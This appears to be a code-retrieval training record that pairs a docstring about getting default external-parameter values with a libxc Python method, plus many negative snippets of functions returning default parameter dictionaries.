[ "0.7344136", "0.66554403", "0.6622951", "0.6612917", "0.6590222", "0.65895045", "0.65495247", "0.6545839", "0.64892864", "0.6436556", "0.6409071", "0.6368646", "0.6351103", "0.6338677", "0.6323158", "0.63069546", "0.628588", "0.628588", "0.6284201", "0.6275635", "0.62606674", "0.62537086", "0.6227173", "0.6226887", "0.62034166", "0.6192739", "0.6192115", "0.61768305", "0.61747104", "0.6159948", "0.61568415", "0.6150448", "0.61442703", "0.61311847", "0.61311847", "0.61235636", "0.6119077", "0.61083984", "0.60845923", "0.60761184", "0.6045526", "0.6031636", "0.6015436", "0.60061324", "0.6004565", "0.5992909", "0.5974509", "0.594109", "0.5923595", "0.5922974", "0.5921195", "0.59178334", "0.5913342", "0.5905441", "0.59053254", "0.5882289", "0.5881651", "0.58783495", "0.5860041", "0.5859595", "0.5858152", "0.5854411", "0.58431596", "0.584066", "0.583517", "0.583517", "0.583517", "0.58348227", "0.58348227", "0.5830074", "0.582852", "0.582852", "0.582852", "0.582852", "0.582852", "0.5828332", "0.5823732", "0.5822458", "0.581928", "0.58124393", "0.58124393", "0.58124393", "0.58124393", "0.58124393", "0.58124393", "0.58124393", "0.58124393", "0.58005863", "0.5799619", "0.5798829", "0.57776505", "0.576831", "0.5766746", "0.57631886", "0.576316", "0.5761059", "0.5759194", "0.5757899", "0.5754541", "0.57540774" ]
0.7465921
0
Gets the default values of all external parameters.
def get_ext_param_default_values(self): num_param = core.xc_func_info_get_n_ext_params(self.xc_func_info) ret = [] for p in range(num_param): tmp = core.xc_func_info_get_ext_params_default_value(self.xc_func_info, p) ret.append(tmp) return ret
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def parameters_default(cls):\n return cls._Parameters.__new__.__defaults__", "def default_parameters(self) -> List[Parameter]:\n return self.settings.job_default_parameters", "def initDefaults(self):\n return _libsbml.Parameter_initDefaults(self)", "def parameters(self):\n return self._default_params", "def get_parameters(self):\n params = {}\n for p in self.DEFAULT_VALUES.keys():\n params[p] = getattr(self, p)\n return params", "def get_default_parameters(self, default_type):\n return self._default_parameters.get(default_type, {})", "def getDefaultParameterValues(self):\r\n dct = {}\r\n self.initializeRoadRunnerModel()\r\n self.roadrunnerModel.reset()\r\n for parameterName in self.parametersToFit:\r\n dct[parameterName] = self.roadrunnerModel.model[parameterName]\r\n return dct", "def get_defaults(self):\n\t\treturn self.__defaults", "def _resolve_defaults(self, **kwargs):\n res = list()\n for name, value in kwargs.items():\n if value is None:\n value = self.default(name)\n if value is None:\n raise RuntimeError(f\"Missing default {name}\")\n res.append(value)\n return res", "def _get_default_import_values(self, cr, uid, external_session, mapping_id=None, defaults=None, context=None):\n return defaults", "def _default_parameters():\n\n return {\n 'opt': 'adadelta',\n 'activation_function': 'softmax',\n 'lr': 0.0001,\n 'decay': 1e-6,\n 'loss': 'categorical_crossentropy',\n 'batch_size': 32,\n 'nb_epoch': 20,\n 'shuffle': True,\n 'momentum': 0.9,\n 'nesterov': True,\n 'rho': 0.95,\n 'epsilon': 1e-08,\n 'beta_1': 0.9,\n 'beta_2': 0.999,\n 'horizontal_flip': False,\n 'im_size': 240,#256,\n 'dense_layer': 1024,\n 'nb_classes': 10,\n 'nb_channels': 3,\n 'dropout': 0.5,\n 'metrics': ['accuracy'],\n 'volume': None,\n 'input_size': 25,\n 'temporal': False,\n 'input_dim': 512,\n 'nb_frames': 60,\n 'stride': 16,\n 'nb_hidden':512,\n 'lstm': False\n\n }", "def get_defaultvalues(host):\n return get_obj_defaultvalues(OBJT_HOST, host)", "def _get_default_parameters(new_values):\n no_default = [\"BEAM\", \"TYPE\", \"ERRORDEF\", \"CORRECTIONS\"]\n\n not_found = [nf for nf in no_default if nf not in new_values]\n if any(not_found):\n raise ValueError(\"Required parameters '{}' not found.\".format(not_found))\n\n # Some defaults\n default = {\n # Beam Parameters\n \"QX\": \"62.31\",\n \"QY\": \"60.32\",\n \"CHROMX\": \"3\",\n \"CHROMY\": \"3\",\n # Settings\n \"USETHIN\": \"1\",\n \"ARCERRORS\": \"0\",\n \"CALCCORRECTIONS\": \"1\",\n # Outputs\n \"NOMINALMACHINE\": \"\",\n \"ARCAPPLIED\": \"\",\n \"MQXAPPLIED\": \"\",\n \"MBIPAPPLIED\": \"\",\n \"ALLAPPLIED\": \"\",\n \"CORRECTED\": \"\",\n }\n\n # crossing angles and separation bumps\n for idx in [1,2,5,8]:\n for prefix in [\"XING\", \"SEP\", \"PHI\"]:\n default[\"{:s}{:d}\".format(prefix, idx)] = \"0\"\n\n # applied errors\n for idx in range(1, 12):\n for orientation in [\"A\", \"B\"]:\n default[\"{:s}{:d}\".format(orientation, idx)] = \"0\"\n\n # return dictionary filled with defaults and new values\n default.update(new_values)\n return default", "def default_parameters():\n return BackendNSParameters()", "def default_values(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:\n return pulumi.get(self, \"default_values\")", "def get_default_params():\n\n with IOTools.open_file(os.path.join(os.path.dirname(__file__),\n \"defaults.yml\")) as inf:\n result = yaml.load(inf, Loader=RoundTripLoader)\n return result", "def _get_default_export_values(self, cr, uid, external_session, mapping_id=None, defaults=None, context=None):\n return defaults", "def get_default_args(func):\n signature = inspect.signature(func)\n return {\n k: v.default\n for k, v in signature.parameters.items()\n if v.default is not inspect.Parameter.empty\n }", "def _apply_defaults(self):\n # Applies normal parameter defaults\n for scalar_parameter, value in self._DEFAULT_PARAMETER_SCALARS.items():\n if scalar_parameter not in self.parameters:\n self.parameters[scalar_parameter] = copy.copy(value)\n\n # Applies defaults to all ramp parameters\n for table_parameter, table in self._DEFAULT_PARAMETER_TABLES.items():\n self.parameters[table_parameter] = [list(tup) for tup in table]\n self.parameters['_' + table_parameter] = zip(*self.parameters[table_parameter])", "def get_default_params() -> Dict:\n default_params = {\n \"n_estimators\": {\n \"default_value\": 100,\n \"description\": \"Number of gradient boosted trees. \"\n \"Equivalent to number of boosting rounds.\",\n \"type\": \"int\"\n },\n \"max_depth\": {\n \"default_value\": 6,\n \"description\": \"Maximum tree depth for base learners.\",\n \"type\": \"int\"\n },\n \"learning_rate\": {\n \"default_value\": 0.3,\n \"description\": \"Boosting learning rate (xgb's 'eta')\",\n \"type\": \"float\"\n },\n \"verbosity\": {\n \"default_value\": 1,\n \"description\": \"The degree of verbosity. Valid values are 0 (silent) - 3 (debug).\",\n \"type\": [0, 1, 2, 3]\n },\n \"booster\": {\n \"default_value\": \"gbtree\",\n \"description\": \"Specify which booster to use: gbtree, gblinear or dart.\",\n \"type\": ['gbtree', 'gblinear', 'dart']\n },\n \"tree_method\": {\n \"default_value\": \"auto\",\n \"description\":\n '''\n Specify which tree method to use. Default to auto. If this parameter\n is set to default, XGBoost will choose the most conservative option\n available. It's recommended to study this option from parameters\n document.\n ''',\n \"type\": [\"auto\", \"exact\", \"approx\", \"hist\", \"gpu_hist\"]\n },\n \"n_jobs\": {\n \"default_value\": 1,\n \"description\": '''\n Number of parallel threads used to run xgboost. When used with other Scikit-Learn\n algorithms like grid search, you may choose which algorithm to parallelize and\n balance the threads. Creating thread contention will significantly slow dowm both\n algorithms.\n ''',\n \"type\": \"int\"\n },\n \"gamma\": {\n \"default_value\": 0.0,\n \"description\": \"Minimum loss reduction required to make a further \"\n \"partition on a leaf node of the tree.\",\n \"type\": \"float\"\n },\n \"min_child_weight\": {\n \"default_value\": 1.0,\n \"description\": \"Minimum loss reduction required to make a further \"\n \"partition on a leaf node of the tree.\",\n \"type\": \"float\"\n },\n \"max_delta_step\": {\n \"default_value\": 0.0,\n \"description\": \"Maximum delta step we allow each tree's weight estimation to be.\",\n \"type\": \"float\"\n },\n \"subsample\": {\n \"default_value\": 1.0,\n \"description\": \"Subsample ratio of the training instance.\",\n \"type\": \"float\"\n },\n \"colsample_bytree\": {\n \"default_value\": 1.0,\n \"description\": \"Subsample ratio of columns when constructing each tree.\",\n \"type\": \"float\"\n },\n \"colsample_bylevel\": {\n \"default_value\": 1.0,\n \"description\": \"Subsample ratio of columns for each level.\",\n \"type\": \"float\"\n },\n \"colsample_bynode\": {\n \"default_value\": 1.0,\n \"description\": \"Subsample ratio of columns for each split.\",\n \"type\": \"float\"\n },\n \"reg_alpha\": {\n \"default_value\": 0.0,\n \"description\": \"L1 regularization term on weights\",\n \"type\": \"float\"\n },\n \"reg_lambda\": {\n \"default_value\": 0.0,\n \"description\": \"L2 regularization term on weights\",\n \"type\": \"float\"\n },\n \"scale_pos_weight\": {\n \"default_value\": 1.0,\n \"description\": \"Balancing of positive and negative weights.\",\n \"type\": \"float\"\n },\n \"random_state\": {\n \"default_value\": 0,\n \"description\": \"Random number seed.\",\n \"type\": \"int\"\n },\n \"base_score\": {\n \"default_value\": 0.5,\n \"description\": \"The initial prediction score of all instances, global bias.\",\n \"type\": \"float\"\n },\n # \"missing\": {\n # \"default_value\": None,\n # \"description\": \"Value in the data which needs to be present as a missing value.\",\n # \"type\": \"float\"\n # },\n \"num_parallel_tree\": {\n \"default_value\": 1,\n \"description\": \"Used for boosting random forest.\",\n \"type\": \"int\"\n },\n # \"monotone_constraints\": {\n # \"default_value\": \"(0,0)\",\n # \"description\": \" Constraint of variable monotonicity. \"\n # \"See tutorial for more information.\",\n # \"type\": \"str\"\n # },\n # \"interaction_constraints\": {\n # \"default_value\": None,\n # \"description\": '''\n # Constraints for interaction representing permitted interactions. The\n # constraints must be specified in the form of a nest list, e.g. [[0, 1],\n # [2, 3, 4]], where each inner list is a group of indices of features\n # that are allowed to interact with each other. See tutorial for more\n # information\n # ''',\n # \"type\": \"str\"\n # },\n \"importance_type\": {\n \"default_value\": \"gain\",\n \"description\": '''\n The feature importance type for the feature_importances. property:\n either \"gain\", \"weight\", \"cover\", \"total_gain\" or \"total_cover\".\n ''',\n \"type\": [\"gain\", \"weight\", \"cover\", \"total_gain\", \"total_cover\"]\n }\n }\n\n return default_params", "def default_parameters(name):\n prm = Parameters(name)\n\n prm.add('venous_compliance', float())\n prm.add('arterial_compliance', float())\n\n prm.add('venous_resistance', float())\n prm.add('arterial_resistance', float())\n prm.add('peripheral_resistance', float())\n\n prm.add('venous_resting_volume', float())\n prm.add('arterial_resting_volume', float())\n\n return prm", "def default_parameters():\n prm = Parameters('windkessel_model')\n\n prm.add('total_volume', float())\n\n prm.add('venous_compliance', float())\n prm.add('arterial_compliance', float())\n\n prm.add('venous_resistance', float())\n prm.add('arterial_resistance', float())\n prm.add('peripheral_resistance', float())\n\n prm.add('venous_resting_volume', float())\n prm.add('arterial_resting_volume', float())\n\n return prm", "def get_optional_parameters(self) -> list:\n results = []\n if self.no_params or self.params_required:\n return []\n else:\n for parameter, parameter_details in self.parameters.items():\n # Fixing issue #92\n # if parameter == \"effect\":\n # continue\n if parameter_details.default_value:\n results.append(parameter_details.name)\n return results", "def _default_params(self) -> dict[str, Any]:\n return {\n \"max_tokens\": self.max_tokens,\n \"temperature\": self.temperature,\n \"top_p\": self.top_p,\n \"logprobs\": self.logprobs,\n \"echo\": self.echo,\n \"stop_sequences\": self.stop_sequences,\n \"repeat_penalty\": self.repeat_penalty,\n \"top_k\": self.top_k,\n \"n_threads\": self.n_threads,\n \"n_ctx\": self.n_ctx,\n \"n_gpu_layers\": self.n_gpu_layers,\n \"n_gqa\": self.n_gqa if self.n_gqa else None,\n \"n_parts\": self.n_parts,\n \"seed\": self.seed,\n \"f16_kv\": self.f16_kv,\n \"logits_all\": self.logits_all,\n \"vocab_only\": self.vocab_only,\n \"use_mlock\": self.use_mlock,\n \"n_batch\": self.n_batch,\n \"last_n_tokens_size\": self.last_n_tokens_size,\n \"streaming\": self.streaming,\n }", "def _initialize_defaults(self):\n for key, value in defaults.items():\n if key not in self.source_params:\n self.source_params[key] = value", "def _initialize_defaults(self):\n for key, value in defaults.items():\n if key not in self.source_params:\n self.source_params[key] = value", "def get_cfg_defaults():\n # Return a clone so that the defaults will not be altered\n # This is for the \"local variable\" use pattern\n return C.clone()", "def getDefaultProperties(self):\n return _libsbml.SBMLLocalParameterConverter_getDefaultProperties(self)", "def get_cfg_defaults():\r\n # Return a clone so that the defaults will not be altered\r\n # This is for the \"local variable\" use pattern\r\n return _C.clone()", "def default_params():\n params = {}\n params['dataset'] = 'adult'\n params['engines'] = ['MD','RDA']\n params['iters'] = 10000\n params['epsilon'] = 1.0\n params['delta'] = 0.0\n params['bounded'] = True\n params['frequency'] = 1\n params['seed'] = 0\n params['save'] = None\n params['load'] = None\n params['plot'] = None\n\n return params", "def test_defaults(self):\n fparam = FParameter(POSITIONAL_ONLY)\n assert fparam.kind == POSITIONAL_ONLY\n for k, v in FPARAM_DEFAULTS.items():\n assert getattr(fparam, k) == v", "def _external_params():\n list_ext_params = []\n list_ext_params.append(\n (hoomd.md.external.field.Periodic, \"params\",\n list([dict(A=1.5, i=1, w=3.5, p=5),\n dict(A=10, i=0, w=3.4, p=2)]), _evaluate_periodic))\n list_ext_params.append(\n (hoomd.md.external.field.Electric, \"E\", list([\n (1, 0, 0),\n (0, 2, 0),\n ]), _evaluate_electric))\n return list_ext_params", "def get_defaults(self):\n default_dict = {}\n args, varargs, keyword, defaults = inspect.getargspec(self.exec_obj)\n if defaults:\n default_dict = dict(zip(args[-len(defaults):], defaults))\n return default_dict", "def defaults(self):\n\n return None", "def defaults(self):\n\n return None", "def get_cfg_defaults():\n # Return a clone so that the defaults will not be altered\n # This is for the \"local variable\" use pattern\n return _C.clone()", "def get_cfg_defaults():\n # Return a clone so that the defaults will not be altered\n # This is for the \"local variable\" use pattern\n return _C.clone()", "def get_required_parameters(self) -> list:\n results = []\n if self.no_params or self.params_optional:\n return []\n else:\n for parameter, parameter_details in self.parameters.items():\n # Fixing issue #92\n # if parameter == \"effect\":\n # continue\n if not parameter_details.default_value:\n results.append(parameter_details.name)\n return results", "def default_hparams():\n return {\n \"value\": 0.,\n \"name\": \"constant_connector\"\n }", "def defaults() -> dict:\n pass", "def show_defaults(context: CreateCommandsContext):\n logger.info(\"Default parameters when creating jobs:\")\n for parameter in context.settings.job_default_parameters:\n logger.info(parameter.describe())", "def get_cfg_defaults():\n # Return a clone so that the defaults will not be altered\n # This is for the \"local variable\" use pattern\n return _C.clone()", "def get_cfg_defaults():\n # Return a clone so that the defaults will not be altered\n # This is for the \"local variable\" use pattern\n return _C.clone()", "def defaults():\n global __preset_staging\n \n t = TreeDict('Default_Parameter_Tree', __defaultpresettree__ = True)\n __preset_staging[id(t)] = t\n return t", "def get_default_configuration():\n # Pre-configured default values for various parameters:\n default_config = {\n \"name\":\"Transient\",\n \"auto\":True,\n \"ra\":0.0,\n \"dec\":0.0,\n \"radius\":10.0,\n \"resolution\":1.8,\n \"energy\":70.0,\n \"pixsize\": 16,\n \"respcode\":\"czti_Aepix.out\",\n \"txycode\":\"radec2txty.out\",\n \"resppath\":\"pixarea\",\n \"plotfile\":\"plots/localize.pdf\",\n\t \"lc_bin\":5.0,\n\t \"typ\":\"band\",\n\t \"comp_bin\":20,\t\n \"verbose\":True,\n \"do_fit\":True\n }\n required_config = {\n 'l2file':\"_level2.evt\",\n 'infile':\"file.evt\",\n 'mkffile':\"file.mkf\",\n 'trigtime':0.00,\n 'transtart':0.00,\n 'tranend':0.00,\n 'bkg1start':0.00,\n 'bkg1end':0.00,\n 'bkg2start':0.00,\n 'bkg2end':0.00,\n\t 'alpha':0.00,\n\t 'beta':0.00,\n\t 'E0':0.00,\n\t 'A':0.00\n }\n return default_config, required_config", "def default_parameters(name):\n prm = Parameters(name)\n\n prm.add('total_volume', 5000.0) # Not important for non-closed loop. Included for compatibility.\n\n prm.add('venous_pressure', float())\n\n prm.add('arterial_compliance', float())\n\n prm.add('venous_resistance', float())\n prm.add('arterial_resistance', float())\n prm.add('peripheral_resistance', float())\n\n return prm", "def _default_params(self) -> Dict[str, Any]:\n normal_params = {\n \"temperature\": self.temperature,\n \"max_tokens\": self.max_tokens,\n \"top_p\": self.top_p,\n \"frequency_penalty\": self.frequency_penalty,\n \"presence_penalty\": self.presence_penalty,\n \"n\": self.n,\n # \"best_of\": self.best_of,\n \"request_timeout\": self.request_timeout,\n \"logit_bias\": self.logit_bias,\n }\n return {**normal_params, **self.model_kwargs}", "def _default_parameters(cls) -> Options:\n params = super()._default_parameters()\n params.main_axes = None\n params.i_means = None\n params.q_means = None\n params.scales = None\n\n return params", "def default_parameters():\n prm = Parameters('lvad_model')\n\n prm.add('lvad_volume', 66.0)\n\n prm.add('alpha_slope', 0.0091)\n prm.add('alpha_intercept', 1.4)\n\n prm.add('beta_slope', -0.19)\n prm.add('beta_intercept', -1.9)\n\n prm.add('frequency', float())\n\n return prm", "def test_get_pipeline_default_parameters(self):\n pipeline_id = 2\n response = self.client.get_pipeline_default_parameters(pipeline_id,\n {'limit': 50, 'offset': 0})\n self.assertEqual(response['total'], 15)", "def test_defaults(self):\n params = DefaultsInterface()\n # make sure from_param_server can be called repeatedly\n params.from_param_server()\n\n self.assertEqual(params.verbosity_param_w_default, 'info')\n\n self.assertEqual(params.int_param_w_default, 1)\n self.assertAlmostEqual(params.double_param_w_default, 1.1)\n self.assertEqual(params.str_param_w_default, \"Hello World\")\n self.assertEqual(params.bool_param_w_default, True)\n self.assertEqual(params.long_param_w_default_int, 1)\n self.assertEqual(params.long_param_w_default_int_str, -1)\n self.assertEqual(params.long_param_w_default_long_string, 9223372036854775807)\n\n self.assertEqual(params.vector_int_param_w_default, [1, 2, 3])\n self.assertEqual(params.vector_double_param_w_default, [1.1, 1.2, 1.3])\n self.assertEqual(params.vector_string_param_w_default, [\"Hello\", \"World\"])\n\n self.assertEqual(params.map_param_w_default, {\"Hello\": \"World\"})\n self.assertEqual(params.enum_int_param_w_default, 1)\n self.assertEqual(params.enum_str_param_w_default, \"One\")", "def init(self, cr):\n param_obj = self.pool.get('ir.config_parameter')\n for key, func in _default_parameters.iteritems():\n ids = param_obj.search(cr, 1, [('key', '=', key)])\n if not ids:\n param_obj.set_param(cr, 1, key, func())", "def default_data(metadata=False):\n parampath = Parameters.params_path\n if not os.path.exists(parampath):\n path_in_egg = os.path.join(\"taxcalc\", Parameters.PARAM_FILENAME)\n buf = resource_stream(Requirement.parse(\"taxcalc\"), path_in_egg)\n _bytes = buf.read()\n as_string = _bytes.decode(\"utf-8\")\n params = json.loads(as_string)\n else:\n with open(Parameters.params_path) as f:\n params = json.load(f)\n\n if (metadata):\n return params\n else:\n return { k: v['value'] for k,v in params.items()}", "def defaults():\n return {}", "def initial_parameters(self):\n return self._initial_parameters", "def set_default_parameters(self):\n super().set_default_parameters()", "def getDefaultParams():\n defpar = [\n # coordinate system\n ['crd_sys', \"'sph'\", 'Coordinate system'],\n ['nx', '[60, 40, 30]', 'Number of grid points in the first dimension'],\n ['xbound', '[0.1*au, 30.*au, 110.*au, 250.*au]', 'Number of radial grid points'],\n ['ny', '[10,30, 30, 10]',\n 'Number of grid points in the second dimension'],\n ['ybound', '[0.1, pi/6., pi/2., 5.*pi/6., 3.04]',\n 'Number of radial grid points'],\n ['nz', '[361]', 'Number of grid points in the third dimension'],\n ['zbound', '[0., 2.0*pi]', 'Number of radial grid points'],\n # star related\n ['tstar', '[3900.0]', 'Temperature of star'],\n ['mstar', '[1.0*ms]', 'Mass of the star(s)'],\n ['rstar', '[2.5*rs]', 'Radius of star'],\n # gas density \n ['Rin', '[0.1*au, 80*au]', 'inner bounding edge'],\n ['Rin_w', '[0, 1*au]', 'gaussian taper before inner edge'], \n ['Rout', '[30*au, 120*au]', 'outer bounding edge'],\n ['Rout_w', '[1*au, 1*au]', 'gaussian taper after outer edge'], \n ['sigp', '[-1.0, -1.5]', 'power-law surface density'],\n ['sig0', '[1e2, 1e1]', 'surface density at Rin in g/cm^2'], \n ['ring_r', '[50*au]', 'location of gaussian ring'], \n ['ring_win', '[5*au]', 'width of gaussian ring in inner radius'],\n ['ring_wout', '[5*au]', 'width of gaussian ring in outer radius'], \n ['ring_a', '[1e2]', 'surface density at center of ring in g/cm^2]'], \n ['cutgdens', '1e-30', 'cut for density'], \n ['Rt', '100*au', 'radius for scale height'], \n ['Ht', '10*au', 'scale height'], \n ['qheight', '1.25', 'height power-law'], \n # gas species\n ['gasspec_mol_name', \"['12co']\", 'name of molecule'],\n ['gasspec_mol_abun', '[5e-5]', 'mass abundance '],\n ['gasspec_mol_dbase_type', \"['leiden']\", ''],\n ['gasspec_mol_freezeout_dfact', '[1e-3]',\n 'Factor by which the molecular abundance should be decreased in the freeze-out zone'],\n ['mol_freeze_Ht', '[24*au]', 'Height at Rt, with index=qheight, for freeze out to happen'],\n ['mol_freeze_del_hfrac', '0.2', 'Gaussian taper for freeze-out. del H = h * hfrac'],\n ['mol_snowR', '[20*au]', 'Radius when freeze out begins to happen'],\n # dust density\n # flat power-law parts\n ['dRin', '[0.1*au, 80*au]', 'inner bounding edge'],\n ['dRin_w', '[0, 1*au]', 'gaussian taper before inner edge'], \n ['dRout', '[30*au, 120*au]', 'outer bounding edge'],\n ['dRout_w', '[1*au, 1*au]', 'gaussian taper after outer edge'], \n ['dsigp', '[-1.0, -1.5]', 'power-law surface density'],\n ['dsig0', '[1e2, 1e1]', 'surface density at Rin'],\n # Lynden-Bell parts\n ['dLB_Rin', '[0.1*au]', 'inner bounding radius'], \n ['dLB_Rsig', '[30*au]', 'charcteristic radius'],\n ['dLB_sigp', '[-1.0]', 'power-law exponent. Careful, the sign is different from the usual function by a negative sign for consistency with flat power-law'], \n ['dLB_sig0', '[1e2]', 'surface density'], \n # ring parts\n ['dring_r', '[50*au]', 'location of gaussian ring'],\n ['dring_win', '[5*au]', 'width of gaussian ring in inner radius'],\n ['dring_wout', '[5*au]', 'width of gaussian ring in outer radius'], \n ['dring_a', '[1e2]', 'surface density at center of ring in g/cm^2]'],\n ['cutddens', '1e-30', 'cut for dust density'],\n ['dRt', '[100*au]', 'radius for scale height for each grain size'], \n ['dHt', '[10*au]', 'scale height for each grain size'], \n ['dqheight', '[1.25]', 'scale height power-law for dust'], \n # temperature\n ['T0mid', '50', 'mid plane temperature at Rt'],\n ['T0atm', '50', 'atmosphere temperature at Rt'],\n ['zqratio', '3', 'factor of Ht of where temperature transition occurs'],\n ['qmid', '-0.5', 'midplane temperature exponent'],\n ['qatm', '-0.5', 'atmosphere temperature exponent'],\n ['hdel', '2', 'temperature transition exponent '],\n ['cuttemp', '10', 'temperature cut'], \n # alignment\n ['altype', \"'toroidal'\", 'alignment type']\n ]\n\n return defpar", "def _get_job_defaults():\n\n lines = []\n lines += '[Job]\\n'\n j = Job()\n for cj in j._config_names:\n v = getattr(j, cj)\n lines += '%s = %s\\n' % (cj, v)\n lines += '\\n'\n return lines", "def getInitParams(self):\n paramDict = BoostDistribution.getInitParams(self)\n paramDict['apex' ] = self.apex\n paramDict['min' ] = self.min\n paramDict['max' ] = self.max\n return paramDict", "def defaults():\r\n return fmin([], [])", "def get_defaults():\n\n return {\n 'base_types': _get_base_types(),\n 'template_types': _get_template_types(),\n 'refined_types': _get_refined_types(),\n 'humannames': _get_humannames(),\n 'argument_kinds': _get_argument_kinds(),\n 'variable_namespace': {},\n 'type_aliases': _get_type_aliases(),\n 'cpp_types': _get_cpp_types(),\n 'numpy_types': _get_numpy_types(),\n 'from_pytypes': _get_from_pytypes(),\n 'cython_ctypes': _get_cython_ctypes(),\n 'cython_cytypes': _get_cython_cytypes(),\n 'cython_pytypes': _get_cython_pytypes(),\n 'cython_cimports': _get_cython_cimports(),\n 'cython_cyimports': _get_cython_cyimports(),\n 'cython_pyimports': _get_cython_pyimports(),\n 'cython_functionnames': _get_cython_functionnames(),\n 'cython_classnames': _get_cython_classnames(),\n 'cython_c2py_conv': _get_cython_c2py_conv(),\n 'cython_py2c_conv_vector_ref': CYTHON_PY2C_CONV_VECTOR_REF,\n 'cython_py2c_conv': _get_cython_py2c_conv(),\n }", "def default_hparams():\n raise NotImplementedError('Not implemented')", "def get_defaults():\n\n return {\n \"numberofrules\": 0,\n \"datapath\": path_join_robust(BASEDIR_PATH, \"data\"),\n \"freshen\": True,\n \"replace\": False,\n \"backup\": False,\n \"skipstatichosts\": False,\n \"keepdomaincomments\": True,\n \"extensionspath\": path_join_robust(BASEDIR_PATH, \"extensions\"),\n \"extensions\": [],\n \"compress\": False,\n \"minimise\": False,\n \"outputsubfolder\": \"\",\n \"hostfilename\": \"hosts\",\n \"targetip\": \"0.0.0.0\",\n \"sourcedatafilename\": \"update.json\",\n \"sourcesdata\": [],\n \"readmefilename\": \"readme.md\",\n \"readmetemplate\": path_join_robust(BASEDIR_PATH, \"readme_template.md\"),\n \"readmedata\": {},\n \"readmedatafilename\": path_join_robust(BASEDIR_PATH, \"readmeData.json\"),\n \"exclusionpattern\": r\"([a-zA-Z\\d-]+\\.){0,}\",\n \"exclusionregexes\": [],\n \"exclusions\": [],\n \"commonexclusions\": [\"hulu.com\"],\n \"blacklistfile\": path_join_robust(BASEDIR_PATH, \"blacklist\"),\n \"whitelistfile\": path_join_robust(BASEDIR_PATH, \"whitelist\"),\n }", "def default_slc_dict():\n par = _par.ParameterFile.from_file(_os.path.dirname(__file__) + '/default_slc_par.par')\n return par", "def get_base_parameters(cls):\n return {\n \"cutoff\": None,\n \"method\": None\n }", "def defaults(self):\n return self.conf.get(\"defaults\", [])", "def post_init(cr, registry):\n from ecore import SUPERUSER_ID\n from ecore.addons.base.ir.ir_config_parameter import _default_parameters\n ICP = registry['ir.config_parameter']\n for k, func in _default_parameters.items():\n v = ICP.get_param(cr, SUPERUSER_ID, k)\n _, g = func()\n ICP.set_param(cr, SUPERUSER_ID, k, v, g)", "def _params(self, **kwargs):\n defaults = {'display_name': 'Test User',\n 'locale': 'en-us',\n 'country': 'us'}\n defaults.update(kwargs)\n\n return defaults", "def getInitParams(self):\n paramDict = Distribution.getInitParams(self)\n paramDict['mapping'] = self.mapping\n paramDict['values'] = self.values\n return paramDict", "def load_parameters(self):\n with open(INTERNAL_DATA_DIR / self.name_default_params, 'r') as f:\n return yaml.load(f, Loader=yaml.FullLoader)", "def get_params_for(self, prefix):\n params = super().get_params_for(prefix)\n\n if prefix == \"module\":\n # Explicitly set parameters override the default values.\n defaults = self._get_extra_module_parameters()\n defaults.update(params)\n return defaults\n else:\n return params\n return params", "def defaults(self):\n self.lib.iperf_defaults(self._test)", "def getDefaultSettings():\n return {}", "def requested_config_vals():\n return {} # no extra values needed", "def getDefault():", "def getDefaults():\n return {\n 'minsize': 10, # minimum size in MB\n 'pattern': [], # file name patterns\n }", "def get_default_prior_params(n_allele):\n\n prior_params_dict = dict()\n prior_params_paragami = paragami.PatternDict()\n\n # DP prior parameter for the individual admixtures\n prior_params_dict['dp_prior_alpha'] = np.array([6.0])\n prior_params_paragami['dp_prior_alpha'] = \\\n paragami.NumericArrayPattern(shape=(1, ), lb = 0.0)\n\n # prior on the allele frequencies\n # beta distribution parameters\n prior_params_dict['allele_prior_lambda_vec'] = np.ones(n_allele)\n prior_params_paragami['allele_prior_lambda_vec'] = \\\n paragami.NumericArrayPattern(shape=(n_allele, ), lb = 0.0)\n\n return prior_params_dict, prior_params_paragami", "def initDefaults(self):\n return _libsbml.Point_initDefaults(self)", "def getInitParams(self):\n return {}", "def get_default_model_params(self):\n\n model_params = {\n 'dropout_rate': 0.3,\n 'hidden_layer_size': 160,\n 'learning_rate': 0.01,\n 'minibatch_size': 64,\n 'max_gradient_norm': 0.01,\n 'num_heads': 1,\n 'stack_size': 1\n }\n\n return model_params", "def get_cfg_defaults():\n return _C.clone()", "def default_training_params():\n N_EPOCHS = 100\n BATCH_SIZE = 64\n EPSILON = 0.0001\n return N_EPOCHS, BATCH_SIZE, EPSILON", "def get_default_value(self):\n pass", "def get_injected_params(self):\n if 'data_params' in self.all_params.keys():\n if self.all_params['data_params'] is not None:\n data_params = {}\n for pkey in self.all_params['data_params'].keys():\n data_params[pkey] = \\\n self.all_params['data_params'][pkey]['value']\n else:\n data_params = None\n else:\n data_params = None\n return data_params", "def get_default_object_values() -> Dict[str, AllowedDefaultValueTypes]:\n # TODO(wxy): Cache this as it is accessed many times.\n\n default_object_values: Dict[str, AllowedDefaultValueTypes] = json.loads(\n constants.get_package_file_contents(\n 'extensions', feconf.OBJECT_DEFAULT_VALUES_EXTENSIONS_MODULE_PATH\n )\n )\n return default_object_values", "def resolve_kwdefaults(sign: inspect.Signature) -> Dict[str, Any]:\n kwdefaults = dict() # type: Dict[str, Any]\n\n # Add to the defaults all the values that are needed by the contracts.\n for param in sign.parameters.values():\n if param.default != inspect.Parameter.empty:\n kwdefaults[param.name] = param.default\n\n return kwdefaults", "def _get_params() -> dict:\n\n return EntryPointParameters(\n inputdir=dict(\n type=Path,\n required=True, \n help=\"Measurements path.\"\n ),\n outputdir=dict(\n type=Path,\n required=True,\n help=\"Output directory where to write the calibration factors.\",\n ),\n ips=dict(\n type=int,\n nargs=\"+\",\n choices=IPS,\n required=False,\n help=\"IPs to compute calibration factors for.\",\n ),\n method=dict(\n type=str,\n required=False,\n choices=METHODS,\n default=METHODS[0],\n help=(\n \"Method to be used to compute the calibration factors. \"\n \"The Beta function is used by default.\"\n ),\n ),\n )", "def _get_parameters(self):\n return None", "def get_params(self):\n return []", "def getInitParams(self):\n paramDict = BoostDistribution.getInitParams(self)\n paramDict['low'] = self.low\n paramDict['alpha'] = self.alpha\n paramDict['beta'] = self.beta\n return paramDict", "def _load_parameters(self, default):\n params = {}\n for (key, value) in default:\n params[key] = self._parse_parameter(value)\n \n if not os.path.exists(self._datadir):\n os.makedirs(self._datadir)\n \n # Check if the file already exists, and create a new one, using the \n # passed default values, if necessary\n paramfile = os.path.join(self._datadir, self.id.lower() + '.cfg')\n if (os.path.isfile(paramfile)):\n paramjson = open(paramfile)\n params_var = 